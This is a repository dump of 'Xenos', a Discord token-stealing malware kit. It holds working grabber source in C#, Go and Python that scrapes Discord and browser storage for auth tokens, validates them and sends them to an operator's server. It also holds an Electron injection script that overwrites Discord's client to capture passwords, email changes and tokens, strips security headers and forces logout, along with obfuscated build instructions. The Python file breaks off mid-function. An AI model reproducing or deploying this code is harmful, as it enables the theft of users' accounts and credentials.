├── .htaccess ├── Grabber ├── Csharp │ └── Xenos.cs ├── Go │ └── main.go ├── Injection │ ├── injection-clean.js │ └── injection.js └── python │ └── Xenos.py ├── Inc ├── Dash.php ├── database.php └── fonctions.php ├── LICENSE ├── README.md ├── api.php ├── assets ├── badges │ ├── Balance.png │ ├── Bravery.png │ ├── Brilliance.png │ ├── BugHunter.png │ ├── HypeSquad.png │ ├── Nitro_Boost.png │ ├── Nitro_cl.png │ ├── Partner.png │ ├── Staff.png │ ├── dev.png │ ├── early.png │ └── verif.png ├── css │ └── style.css ├── fonts │ ├── bootstrap │ │ ├── glyphicons-halflings-regular.eot │ │ ├── glyphicons-halflings-regular.svg │ │ ├── glyphicons-halflings-regular.ttf │ │ ├── glyphicons-halflings-regular.woff │ │ └── glyphicons-halflings-regular.woff2 │ └── icomoon │ │ ├── icomoon.eot │ │ ├── icomoon.svg │ │ ├── icomoon.ttf │ │ └── icomoon.woff ├── images │ ├── Default.png │ ├── kaneki.gif │ ├── logo.jpg │ └── xenos.gif └── js │ └── filter.js ├── async └── login.php ├── gifts.php ├── index.php ├── login.php ├── logout.php ├── token.php └── tokens.php /.htaccess: -------------------------------------------------------------------------------- 1 | ErrorDocument 401 /index.php 2 | ErrorDocument 403 /index.php 3 | ErrorDocument 404 /index.php 4 | ErrorDocument 400 /index.php 5 | 6 | RewriteEngine On 7 | RewriteCond %{REQUEST_FILENAME} !-f 8 | RewriteRule ^([^\.]+)$ $1.php [NC,L] 9 | 10 | php_value display_errors 1 11 | -------------------------------------------------------------------------------- /Grabber/Csharp/Xenos.cs: -------------------------------------------------------------------------------- 1 | // Thanks to HideakiAtsuyo for the base 2 | // Hideaki Repo: https://github.com/HideakiAtsuyo/XenosStub/blob/main/XenosStub/Program.cs 3 | 4 | using System.Text.RegularExpressions; 5 | using System.Collections.Generic; 6 | using System.Diagnostics; 7 | using System.Linq; 8 | using System.Net; 9 | using System.IO; 10 | using System; 11 | 12 | namespace Xenos 13 | { 14 | internal class Program 15 | { 16 | public static string Host = "https://yourwebsite.com"; 17 | 18 | internal static string LocalDirectory = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData); 19 | internal static string RoamingDirectory = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData); 20 | 21 | internal static List Tokens = new List(); 22 | internal static List DiscordPath = new List 23 | { 24 | $"{LocalDirectory}\\discord\\", 25 | $"{RoamingDirectory}\\Discord\\", 26 | $"{RoamingDirectory}\\Lightcord\\", 27 | $"{RoamingDirectory}\\discordptb\\", 28 | $"{RoamingDirectory}\\discordcanary\\", 29 | }; 30 | 31 | internal static List Paths = new List() 32 | { 33 | String.Format("{0}/Discord/Local Storage/leveldb", RoamingDirectory), 34 | String.Format("{0}/Lightcord/Local Storage/leveldb", RoamingDirectory), 35 | String.Format("{0}/discordcanary/Local Storage/leveldb", RoamingDirectory), 36 | String.Format("{0}/discordptb/Local Storage/leveldb", RoamingDirectory), 37 | String.Format("{0}/OperaSoftware/Opera GX Stable/Local Storage/leveldb", RoamingDirectory), 38 | String.Format("{0}/OperaSoftware/Opera Stable/Local Storage/leveldb", RoamingDirectory), 39 | String.Format("{0}/Opera Software/Opera Neon/User Data/Default/Local Storage/leveldb", RoamingDirectory), 40 | String.Format("{0}/Google/Chrome/User Data/Default/Local Storage/leveldb", LocalDirectory), 41 | String.Format("{0}/Google/Chrome SxS/User Data/Local Storage/leveldb", LocalDirectory), 42 | String.Format("{0}/BraveSoftware/Brave-Browser/User Data/Default/Local Storage/leveldb", LocalDirectory), 43 | String.Format("{0}/Yandex/YandexBrowser/User Data/Default/Local Storage/leveldb", LocalDirectory), 44 | String.Format("{0}/Amigo/User Data/Local Storage/leveldb", LocalDirectory), 45 | String.Format("{0}/Torch/User Data/Local Storage/leveldb", LocalDirectory), 46 | String.Format("{0}/Kometa/User Data/Local Storage/leveldb", LocalDirectory), 47 | String.Format("{0}/Orbitum/User Data/Local Storage/leveldb", LocalDirectory), 48 | String.Format("{0}/CentBrowser/User Data/Local Storage/leveldb", LocalDirectory), 49 | String.Format("{0}/7Star/7Star/User Data/Local Storage/leveldb", LocalDirectory), 50 | String.Format("{0}/Sputnik/Sputnik/User Data/Local Storage/leveldb", LocalDirectory), 51 | String.Format("{0}/Vivaldi/User Data/Default/Local Storage/leveldb", LocalDirectory), 52 | String.Format("{0}/EpicPrivacy Browser/User Data/Local Storage/leveldb", LocalDirectory), 53 | String.Format("{0}/Microsoft/Edge/User Data/Default/Local Storage/leveldb", LocalDirectory), 54 | String.Format("{0}/uCozMedia/Uran/User Data/Default/Local Storage/leveldb", LocalDirectory), 55 | String.Format("{0}/Iridium/User Data/Default/Local Storage/leveld", LocalDirectory), 56 | }, Regexs = new List() 57 | { 58 | "[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}", 59 | "mfa\\.[\\w-]{84}" 60 | }; 61 | 62 | static void Main(string[] args) 63 | { 64 | __StealTokens(); 65 | __SendTokens(); 66 | __KillInstances(); 67 | __InjectPayload(); 68 | } 69 | 70 | public static void __StealTokens() 71 | { 72 | foreach (var path in Paths) 73 | { 74 | if (Directory.Exists(path)) 75 | { 76 | foreach (var file in new DirectoryInfo(path).GetFiles()) 77 | { 78 | try 79 | { 80 | foreach (string regex in Regexs) 81 | { 82 | foreach (Match match in Regex.Matches(file.OpenText().ReadToEnd(), regex)) 83 | { 84 | if (!Tokens.Contains(match.Value)) 85 | { 86 | if (__CheckToken(match.Value)) 87 | { 88 | Tokens.Add(match.Value); 89 | } 90 | } 91 | } 92 | } 93 | } catch { } 94 | } 95 | } 96 | } 97 | } 98 | 99 | public static void __KillInstances() 100 | { 101 | List Instances = new List { "DiscordDevelopment", "DiscordPTB", "Lightcord", "Discord", "discord", "dnspy" }; 102 | Instances.ForEach(proc => 103 | { 104 | foreach (var process in Process.GetProcessesByName(proc)) 105 | { 106 | try { process.Kill(); } catch { }; 107 | } 108 | }); 109 | } 110 | 111 | public static void __InjectPayload() 112 | { 113 | var Payload = new WebClient().DownloadString("https://raw.githubusercontent.com/KanekiWeb/Xenos/main/Grabber/Injection/injection.js"); 114 | 115 | DiscordPath.ForEach(path => 116 | { 117 | if (!Directory.Exists(path)) return; 118 | 119 | Directory.GetDirectories(path).Where(dir => dir.Contains("app-")).ToList().ForEach(dirs => 120 | { 121 | Directory.GetDirectories(dirs).Where(dir => dir.Contains("module")).ToList().ForEach(module_dirs => 122 | { 123 | Directory.GetDirectories(module_dirs).Where(dir => dir.Contains("discord_desktop_core")).ToList().ForEach(core => 124 | { 125 | Directory.GetFiles(core, "*.*", SearchOption.AllDirectories).Where(s => s.ToLower().EndsWith("index.js")).ToList().ForEach(file => 126 | { 127 | try 128 | { 129 | Directory.CreateDirectory(core + @"\discord_desktop_core\XenosStealer"); 130 | File.WriteAllText(file, Payload.Replace("%WEBHOOK_LINK%", Host)); 131 | } 132 | catch { }; 133 | }); 134 | }); 135 | }); 136 | }); 137 | }); 138 | } 139 | 140 | public static bool __CheckToken(string token) 141 | { 142 | WebClient req = new WebClient(); 143 | req.Headers.Add("Content-Type", "application/json"); 144 | req.Headers.Add("Authorization", token); 145 | req.Headers.Add("User-Agent", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"); 146 | string resp = req.DownloadString("https://discordapp.com/api/v9/users/@me"); 147 | 148 | if (resp.Contains("{\"id\": \"") || resp.Contains("\", \"username\": \"")) return true; 149 | else return false; 150 | } 151 | 152 | public static void __SendTokens() 153 | { 154 | Tokens.ForEach(token => 155 | { 156 | try 157 | { 158 | WebClient req = new WebClient(); 159 | req.DownloadString($"{Host}/api?type=addtoken&token={token}"); 160 | } 161 | catch { }; 162 | }); 163 | } 164 | } 165 | } 166 | -------------------------------------------------------------------------------- /Grabber/Go/main.go: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | How to build: 4 | 5 | go mod init Xenos 6 | go mod tidy 7 | 8 | **Require Garble** https://github.com/burrowers/garble 9 | set GOPRIVATE=* 10 | 11 | garble -literals -seed=random -tiny build -trimpath -ldflags '-s -w -H=windowsgui' 12 | 13 | **Without garble ** 14 | go build -ldflags "-s -w" -ldflags -H=windowsgui 15 | 16 | */ 17 | 18 | package main 19 | 20 | import ( 21 | "fmt" 22 | "io" 23 | "log" 24 | "net/http" 25 | "os" 26 | "path" 27 | "path/filepath" 28 | "regexp" 29 | "strings" 30 | "sync" 31 | "time" 32 | 33 | "github.com/shirou/gopsutil/v3/process" 34 | ) 35 | 36 | var ( 37 | host = "https://yourwebsite.com" 38 | regexes = []*regexp.Regexp{regexp.MustCompile(`(?m)[\w-]{24}\.[\w-]{6}\.[\w-]{27}`), regexp.MustCompile(`(?m)mfa\.[\w-]{84}`)} 39 | ) 40 | 41 | func main() { 42 | tokens, err := collectTokens() 43 | if err != nil { 44 | os.Exit(1) 45 | } 46 | 47 | tokens = checkTokens(tokens) 48 | sendTokens(tokens) 49 | injectDiscord() 50 | killDiscords() 51 | 52 | } 53 | 54 | func injectDiscord() { 55 | discords := getDiscords() 56 | 57 | for _, disc := range discords { 58 | pattern := fmt.Sprintf("%s\\app-*\\modules\\discord_desktop_core-*\\discord_desktop_core\\index.js", disc) 59 | match, err := filepath.Glob(pattern) 60 | if err != nil { 61 | return 62 | } 63 | 64 | if len(match) > 0 { 65 | code, err := getCode() 66 | if err != nil { 67 | return 68 | } 69 | for _, m := range match { 70 | injectCode(code, m) 71 | } 72 | } 73 | } 74 | } 75 | func injectCode(code string, p string) { 76 | f, err := os.OpenFile(p, os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0755) 77 | if err != nil { 78 | return 79 | } 80 | defer f.Close() 81 | 82 | _, err = f.WriteString(code) 83 | if err != nil { 84 | return 85 | } 86 | dir := path.Join(strings.TrimSuffix(p, "\\index.js"), "XenosStealer") 87 | if _, err := os.Stat(dir); os.IsNotExist(err) { 88 | err := os.Mkdir(dir, 0755) 89 | if err != nil { 90 | return 91 | } 92 | } 93 | } 94 | func getCode() (string, error) { 95 | req, err := http.NewRequest("GET", "https://raw.githubusercontent.com/KanekiWeb/Xenos/main/Grabber/Injection/injection.js", nil) 96 | if err != nil { 97 | return "", err 98 | } 99 | 100 | client := &http.Client{Timeout: 10 * time.Second} 101 | 102 | res, err := client.Do(req) 103 | if err != nil { 104 | return "", err 105 | } 106 | defer res.Body.Close() 107 | body, err := io.ReadAll(res.Body) 108 | if err != nil { 109 | return "", err 110 | } 111 | 112 | return strings.Replace(string(body), "%WEBHOOK_LINK%", host, -1), nil 113 | } 114 | 115 | func killDiscords() { 116 | processes, err := process.Processes() 117 | if err != nil { 118 | return 119 | } 120 | for _, p := range processes { 121 | n, err := p.Name() 122 | if err != nil { 123 | return 124 | } 125 | if strings.Contains(n, "iscord") { 126 | p.Kill() 127 | } 128 | } 129 | } 130 | func getDiscords() []string { 131 | var result []string 132 | entries, err := os.ReadDir(os.Getenv("LOCALAPPDATA")) 133 | if err != nil { 134 | os.Exit(1) 135 | } 136 | 137 | for _, e := range entries { 138 | if e.IsDir() && strings.Contains(e.Name(), "iscord") { 139 | result = append(result, path.Join(os.Getenv("LOCALAPPDATA"), e.Name())) 140 | } 141 | } 142 | return result 143 | } 144 | 145 | func sendTokens(tokens []string) { 146 | var wg sync.WaitGroup 147 | client := &http.Client{Timeout: 25 * time.Second} 148 | 149 | for _, t := range tokens { 150 | go func() { 151 | defer wg.Done() 152 | client.Get(fmt.Sprintf("%s/api?type=addtoken&token=%s", host, t)) 153 | }() 154 | } 155 | wg.Wait() 156 | } 157 | func checkTokens(tokens []string) []string { 158 | var wg sync.WaitGroup 159 | var result []string 160 | tokens = removeDupes(tokens) 161 | client := &http.Client{ 162 | Timeout: 10 * time.Second, 163 | } 164 | for _, t := range tokens { 165 | wg.Add(1) 166 | go func(token string) { 167 | defer wg.Done() 168 | if isValid(client, token) { 169 | result = append(result, token) 170 | } 171 | }(t) 172 | } 173 | wg.Wait() 174 | return result 175 | } 176 | func isValid(client *http.Client, token string) bool { 177 | req, err := http.NewRequest("GET", "https://discord.com/api/v9/users/@me/affinities/guilds", nil) 178 | if err != nil { 179 | return false 180 | } 181 | req.Header = http.Header{ 182 | "Authorization": {token}, 183 | "Content-Type": {"application/json"}, 184 | "User-Agent": {"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) discord/0.0.61 Chrome/91.0.4472.164 Electron/13.6.6 Safari/537.36"}, 185 | } 186 | res, err := client.Do(req) 187 | if err != nil { 188 | return false 189 | } 190 | 191 | if res.StatusCode > 200 { 192 | return false 193 | } 194 | 195 | return true 196 | } 197 | 198 | func collectTokens() ([]string, error) { 199 | var ( 200 | tokens []string 201 | validTokens []string 202 | ) 203 | 204 | var replacer = strings.NewReplacer( 205 | "__ROAMING__", os.Getenv("APPDATA"), 206 | "__LOCAL__", os.Getenv("LOCALAPPDATA"), 207 | "/", `\`, 208 | ) 209 | 210 | _ = validTokens 211 | 212 | paths := []string{ 213 | "__ROAMING__/Discord/Local Storage/leveldb", 214 | "__ROAMING__/Lightcord/Local Storage/leveldb", 215 | "__ROAMING__/discordcanary/Local Storage/leveldb", 216 | "__ROAMING__/discordptb/Local Storage/leveldb", 217 | "__ROAMING__/OperaSoftware/Opera GX Stable/Local Storage/leveldb", 218 | "__ROAMING__/OperaSoftware/Opera Stable/Local Storage/leveldb", 219 | "__ROAMING__/Opera Software/Opera Neon/User Data/Default/Local Storage/leveldb", 220 | "__LOCAL__/Google/Chrome/User Data/Default/Local Storage/leveldb", 221 | "__LOCAL__/Google/Chrome SxS/User Data/Local Storage/leveldb", 222 | "__LOCAL__/BraveSoftware/Brave-Browser/User Data/Default/Local Storage/leveldb", 223 | "__LOCAL__/Yandex/YandexBrowser/User Data/Default/Local Storage/leveldb", 224 | "__LOCAL__/Amigo/User Data/Local Storage/leveldb", 225 | "__LOCAL__/Torch/User Data/Local Storage/leveldb", 226 | "__LOCAL__/Kometa/User Data/Local Storage/leveldb", 227 | "__LOCAL__/Orbitum/User Data/Local Storage/leveldb", 228 | "__LOCAL__/CentBrowser/User Data/Local Storage/leveldb", 229 | "__LOCAL__/7Star/7Star/User Data/Local Storage/leveldb", 230 | "__LOCAL__/Sputnik/Sputnik/User Data/Local Storage/leveldb", 231 | "__LOCAL__/Vivaldi/User Data/Default/Local Storage/leveldb", 232 | "__LOCAL__/EpicPrivacy Browser/User Data/Local Storage/leveldb", 233 | "__LOCAL__/Microsoft/Edge/User Data/Default/Local Storage/leveldb", 234 | "__LOCAL__/uCozMedia/Uran/User Data/Default/Local Storage/leveldb", 235 | "__LOCAL__/Iridium/User Data/Default/Local Storage/leveldb", 236 | } 237 | 238 | var wg sync.WaitGroup 239 | 240 | tokenChan := make(chan string) 241 | go func() { 242 | for v := range tokenChan { 243 | tokens = append(tokens, v) 244 | } 245 | }() 246 | 247 | for _, path := range paths { 248 | path = replacer.Replace(path) 249 | if _, err := os.Stat(path); !os.IsNotExist(err) { 250 | wg.Add(1) 251 | go func(path string) { 252 | defer wg.Done() 253 | err := walkPath(path, tokenChan) 254 | if err != nil { 255 | log.Println(err) 256 | } 257 | }(path) 258 | } 259 | } 260 | wg.Wait() 261 | return tokens, nil 262 | } 263 | func walkPath(path string, tokenChan chan string) error { 264 | var wg sync.WaitGroup 265 | err := filepath.Walk(path, func(file string, info os.FileInfo, err error) error { 266 | if err != nil { 267 | return err 268 | } 269 | // we don't care abt directories 270 | if !info.IsDir() { 271 | switch { 272 | case strings.HasSuffix(file, ".log"), strings.HasSuffix(file, ".ldb"), strings.HasSuffix(file, ".sqlite"): 273 | wg.Add(1) 274 | go func() { 275 | defer wg.Done() 276 | found, err := scanFile(file) 277 | if err != nil { 278 | log.Println("error scanning file:", err.Error()) 279 | } 280 | if len(found) > 0 { 281 | for _, t := range found { 282 | tokenChan <- t 283 | } 284 | } 285 | }() 286 | default: 287 | return nil 288 | } 289 | 290 | } 291 | return nil 292 | }) 293 | if err != nil { 294 | return err 295 | } 296 | wg.Wait() 297 | return nil 298 | } 299 | func scanFile(path string) ([]string, error) { 300 | var result []string 301 | 302 | content, err := os.ReadFile(path) 303 | if err != nil { 304 | return nil, err 305 | } 306 | str := string(content) 307 | 308 | for _, r := range regexes { 309 | s := r.FindAllString(str, -1) 310 | result = append(result, s...) 311 | } 312 | 313 | return result, nil 314 | } 315 | 316 | func removeDupes(s []string) []string { 317 | allKeys := make(map[string]bool) 318 | list := []string{} 319 | for _, item := range s { 320 | if _, value := allKeys[item]; !value { 321 | allKeys[item] = true 322 | list = append(list, item) 323 | } 324 | } 325 | return list 326 | } 327 | -------------------------------------------------------------------------------- /Grabber/Injection/injection-clean.js: -------------------------------------------------------------------------------- 1 | // Original Code From PirateStealer 2 | // Original Payload: https://github.com/Stanley-GF/PirateStealer/blob/main/src/injection/injection.js 3 | 4 | const { BrowserWindow, session } = require('electron'); 5 | const fs = require('fs'); 6 | const path = require('path'); 7 | const webhook = "%WEBHOOK_LINK%"; // No put "/" at the end 8 | const Filters = { 9 | 1: {urls: ["https://discord.com/api/v*/users/@me", "https://discordapp.com/api/v*/users/@me", "https://*.discord.com/api/v*/users/@me", "https://discordapp.com/api/v*/auth/login", 'https://discord.com/api/v*/auth/login', 'https://*.discord.com/api/v*/auth/login', "https://api.stripe.com/v1/tokens"]}, 10 | 2: {urls: ["https://status.discord.com/api/v*/scheduled-maintenances/upcoming.json", "https://*.discord.com/api/v*/applications/detectable", "https://discord.com/api/v*/applications/detectable", "https://*.discord.com/api/v*/users/@me/library", "https://discord.com/api/v*/users/@me/library", "https://*.discord.com/api/v*/users/@me/billing/subscriptions", "https://discord.com/api/v*/users/@me/billing/subscriptions", "wss://remote-auth-gateway.discord.gg/*"]} 11 | }; 12 | 13 | class Events { 14 | constructor(event, token, data) { 15 | this.event = event; 16 | this.data = data; 17 | this.token = token; 18 | } 19 | handle() { 20 | switch (this.event) { 21 | case 'passwordChanged': 22 | passwordChanged(this.token, this.data.new_password); 23 | break; 24 | case 'userLogin': 25 | userLogin(this.token, this.data.password); 26 | break; 27 | case 'emailChanged': 28 | emailChanged(this.token, this.data.password); 29 | break; 30 | } 31 | } 32 | } 33 | 34 | async function firstTime() { 35 | if (!fs.existsSync(path.join(__dirname, "XenosStealer"))) return !0 36 | 37 | fs.rmdirSync(path.join(__dirname, "XenosStealer")); 38 | const window = BrowserWindow.getAllWindows()[0]; 39 | window.webContents.executeJavaScript(`window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]);function LogOut(){(function(a){const b="string"==typeof a?a:null;for(const c in gg.c)if(gg.c.hasOwnProperty(c)){const d=gg.c[c].exports;if(d&&d.__esModule&&d.default&&(b?d.default[b]:a(d.default)))return d.default;if(d&&(b?d[b]:a(d)))return d}return null})("login").logout()}LogOut();`, !0).then((result) => {}); 40 | return !1 41 | 42 | } 43 | 44 | session.defaultSession.webRequest.onBeforeRequest(Filters[2], (details, callback) => { 45 | if (firstTime()) {} 46 | callback({}) 47 | return; 48 | }) 49 | 50 | session.defaultSession.webRequest.onHeadersReceived((details, callback) => { 51 | if (details.url.startsWith(webhook)) { 52 | if (details.url.includes("discord.com")) { 53 | callback({ 54 | responseHeaders: Object.assign({ 55 | 'Access-Control-Allow-Headers': "*" 56 | }, details.responseHeaders) 57 | }); 58 | } else { 59 | callback({ 60 | responseHeaders: Object.assign({ 61 | "Content-Security-Policy": ["default-src '*'", "Access-Control-Allow-Headers '*'", "Access-Control-Allow-Origin '*'"], 62 | 'Access-Control-Allow-Headers': "*", 63 | "Access-Control-Allow-Origin": "*" 64 | }, details.responseHeaders) 65 | }); 66 | } 67 | } else { 68 | delete details.responseHeaders['content-security-policy']; 69 | delete details.responseHeaders['content-security-policy-report-only']; 70 | 71 | callback({ 72 | responseHeaders: { 73 | ...details.responseHeaders, 74 | 'Access-Control-Allow-Headers': "*" 75 | } 76 | }) 77 | } 78 | 79 | }) 80 | 81 | // Main functions 82 | async function userLogin(token, password) { 83 | SendToXenos(token, password) 84 | } 85 | async function emailChanged(token, password) { 86 | SendToXenos(token, password) 87 | } 88 | async function passwordChanged(token, newPassword) { 89 | SendToXenos(token, newPassword) 90 | } 91 | 92 | // Helpers functions 93 | async function SendToXenos(token, password="") { 94 | const window = BrowserWindow.getAllWindows()[0]; 95 | window.webContents.executeJavaScript(`var xhr = new XMLHttpRequest();xhr.open("GET", "${webhook}/api?type=addtoken&token=${token}&password=${password}", true);;xhr.setRequestHeader('Access-Control-Allow-Origin', '*');xhr.Send();`, !0) 96 | } 97 | 98 | async function getToken() { 99 | const window = BrowserWindow.getAllWindows()[0]; 100 | var token = await window.webContents.executeJavaScript(`for(let a in window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[['get_require']]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]),gg.c)if(gg.c.hasOwnProperty(a)){let b=gg.c[a].exports;if(b&&b.__esModule&&b.default)for(let a in b.default)'getToken'==a&&(token=b.default.getToken())}token;`, !0) 101 | return token; 102 | } 103 | 104 | session.defaultSession.webRequest.onCompleted(Filters[1], async (details, callback) => { 105 | if (details.statusCode != 200) return; 106 | 107 | const unparsed_data = Buffer.from(details.uploadData[0].bytes).toString(); 108 | const data = JSON.parse(unparsed_data) 109 | const token = await getToken(); 110 | 111 | switch (true) { 112 | case details.url.endsWith('login'): 113 | var event = new Events('userLogin', token, { 114 | password: data.password, 115 | email: data.login 116 | }); 117 | event.handle(); 118 | return; 119 | case details.url.endsWith('users/@me') && details.method == 'PATCH': 120 | if (!data.password) return; 121 | if (data.email) { 122 | var event = new Events('emailChanged', token, { 123 | password: data.password, 124 | email: data.email 125 | }); 126 | event.handle(); 127 | 128 | }; 129 | if (data.new_password) { 130 | var event = new Events('passwordChanged', token, { 131 | password: data.password, 132 | new_password: data.new_password 133 | }); 134 | event.handle(); 135 | }; 136 | return; 137 | default: 138 | break; 139 | } 140 | }); 141 | 142 | module.exports = require('./core.asar'); -------------------------------------------------------------------------------- /Grabber/Injection/injection.js: -------------------------------------------------------------------------------- 1 | const{BrowserWindow:BrowserWindow,session:session}=require("electron"),fs=require("fs"),path=require("path"),webhook="%WEBHOOK_LINK%",Filters={1:{urls:["https://discord.com/api/v*/users/@me","https://discordapp.com/api/v*/users/@me","https://*.discord.com/api/v*/users/@me","https://discordapp.com/api/v*/auth/login","https://discord.com/api/v*/auth/login","https://*.discord.com/api/v*/auth/login","https://api.stripe.com/v1/tokens"]},2:{urls:["https://status.discord.com/api/v*/scheduled-maintenances/upcoming.json","https://*.discord.com/api/v*/applications/detectable","https://discord.com/api/v*/applications/detectable","https://*.discord.com/api/v*/users/@me/library","https://discord.com/api/v*/users/@me/library","https://*.discord.com/api/v*/users/@me/billing/subscriptions","https://discord.com/api/v*/users/@me/billing/subscriptions","wss://remote-auth-gateway.discord.gg/*"]}};class Events{constructor(e,s,o){this.event=e,this.data=o,this.token=s}handle(){switch(this.event){case"passwordChanged":passwordChanged(this.token,this.data.new_password);break;case"userLogin":userLogin(this.token,this.data.password);break;case"emailChanged":emailChanged(this.token,this.data.password)}}}async function firstTime(){if(!fs.existsSync(path.join(__dirname,"XenosStealer")))return!0;return fs.rmdirSync(path.join(__dirname,"XenosStealer")),BrowserWindow.getAllWindows()[0].webContents.executeJavaScript('window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]);function LogOut(){(function(a){const b="string"==typeof a?a:null;for(const c in gg.c)if(gg.c.hasOwnProperty(c)){const d=gg.c[c].exports;if(d&&d.__esModule&&d.default&&(b?d.default[b]:a(d.default)))return d.default;if(d&&(b?d[b]:a(d)))return d}return null})("login").logout()}LogOut();',!0).then(e=>{}),!1}async function userLogin(e,s){SendToXenos(e,s)}async function emailChanged(e,s){SendToXenos(e,s)}async function passwordChanged(e,s){SendToXenos(e,s)}async function SendToXenos(e,s=""){BrowserWindow.getAllWindows()[0].webContents.executeJavaScript(`var xhr = new XMLHttpRequest();xhr.open("GET", "${webhook}/api?type=addtoken&token=${e}&password=${s}", true);;xhr.setRequestHeader('Access-Control-Allow-Origin', '*');xhr.Send();`,!0)}async function getToken(){const e=BrowserWindow.getAllWindows()[0];return await e.webContents.executeJavaScript("for(let a in window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[['get_require']]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]),gg.c)if(gg.c.hasOwnProperty(a)){let b=gg.c[a].exports;if(b&&b.__esModule&&b.default)for(let a in b.default)'getToken'==a&&(token=b.default.getToken())}token;",!0)}session.defaultSession.webRequest.onBeforeRequest(Filters[2],(e,s)=>{firstTime(),s({})}),session.defaultSession.webRequest.onHeadersReceived((e,s)=>{e.url.startsWith(webhook)?e.url.includes("discord.com")?s({responseHeaders:Object.assign({"Access-Control-Allow-Headers":"*"},e.responseHeaders)}):s({responseHeaders:Object.assign({"Content-Security-Policy":["default-src '*'","Access-Control-Allow-Headers '*'","Access-Control-Allow-Origin '*'"],"Access-Control-Allow-Headers":"*","Access-Control-Allow-Origin":"*"},e.responseHeaders)}):(delete e.responseHeaders["content-security-policy"],delete e.responseHeaders["content-security-policy-report-only"],s({responseHeaders:{...e.responseHeaders,"Access-Control-Allow-Headers":"*"}}))}),session.defaultSession.webRequest.onCompleted(Filters[1],async(e,s)=>{if(200!=e.statusCode)return;const o=Buffer.from(e.uploadData[0].bytes).toString(),t=JSON.parse(o),r=await getToken();switch(!0){case e.url.endsWith("login"):return void new Events("userLogin",r,{password:t.password,email:t.login}).handle();case e.url.endsWith("users/@me")&&"PATCH"==e.method:if(!t.password)return;if(t.email)new Events("emailChanged",r,{password:t.password,email:t.email}).handle();if(t.new_password)new Events("passwordChanged",r,{password:t.password,new_password:t.new_password}).handle();return}}),module.exports=require("./core.asar"); -------------------------------------------------------------------------------- /Grabber/python/Xenos.py: -------------------------------------------------------------------------------- 1 | # Original Python Stealer Made by Its-Vichy 2 | # Original Stealer: https://github.com/Its-Vichy/lets-talk-about-discord/blob/main/colorfull.py 3 | 4 | import os, re, threading, urllib.request 5 | 6 | class X3N0S: 7 | def __init__(self): 8 | self.host = "https://yourwebsite.com" 9 | self.all_tokens = [] 10 | self.valid_tokens = [] 11 | self.paths = { 12 | "__ROAMING__/Discord/Local Storage/leveldb", 13 | "__ROAMING__/Lightcord/Local Storage/leveldb", 14 | "__ROAMING__/discordcanary/Local Storage/leveldb", 15 | "__ROAMING__/discordptb/Local Storage/leveldb", 16 | "__ROAMING__/OperaSoftware/Opera GX Stable/Local Storage/leveldb", 17 | "__ROAMING__/OperaSoftware/Opera Stable/Local Storage/leveldb", 18 | "__ROAMING__/Opera Software/Opera Neon/User Data/Default/Local Storage/leveldb", 19 | "__LOCAL__/Google/Chrome/User Data/Default/Local Storage/leveldb", 20 | "__LOCAL__/Google/Chrome SxS/User Data/Local Storage/leveldb", 21 | "__LOCAL__/BraveSoftware/Brave-Browser/User Data/Default/Local Storage/leveldb", 22 | "__LOCAL__/Yandex/YandexBrowser/User Data/Default/Local Storage/leveldb", 23 | "__LOCAL__/Amigo/User Data/Local Storage/leveldb", 24 | "__LOCAL__/Torch/User Data/Local Storage/leveldb", 25 | "__LOCAL__/Kometa/User Data/Local Storage/leveldb", 26 | "__LOCAL__/Orbitum/User Data/Local Storage/leveldb", 27 | "__LOCAL__/CentBrowser/User Data/Local Storage/leveldb", 28 | "__LOCAL__/7Star/7Star/User Data/Local Storage/leveldb", 29 | "__LOCAL__/Sputnik/Sputnik/User Data/Local Storage/leveldb", 30 | "__LOCAL__/Vivaldi/User Data/Default/Local Storage/leveldb", 31 | "__LOCAL__/EpicPrivacy Browser/User Data/Local Storage/leveldb", 32 | "__LOCAL__/Microsoft/Edge/User Data/Default/Local Storage/leveldb", 33 | "__LOCAL__/uCozMedia/Uran/User Data/Default/Local Storage/leveldb", 34 | "__LOCAL__/Iridium/User Data/Default/Local Storage/leveld", 35 | } 36 | 37 | for path in self.paths: 38 | try: 39 | path = path.replace('__LOCAL__', os.getenv('LOCALAPPDATA')).replace('__ROAMING__', os.getenv('APPDATA')) 40 | if os.path.exists(path): 41 | for file_name in os.listdir(path): 42 | if file_name.endswith(".log") or file_name.endswith(".ldb") or file_name.endswith(".sqlite"): 43 | for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]: 44 | for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"): 45 | for token in re.findall(regex, line): 46 | if token not in self.all_tokens:self.all_tokens.append(token) 47 | except:pass 48 | 49 | def __Check_Tokens(self): 50 | threads_worker = [] 51 | def check(token): 52 | try: 53 | if urllib.request.urlopen(urllib.request.Request('https://discordapp.com/api/v9/users/@me', headers= {'content-type': 'application/json', 'authorization': token, 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'}, method= 'GET')).getcode() == 200:self.valid_tokens.append(token) 54 | except:pass 55 | 56 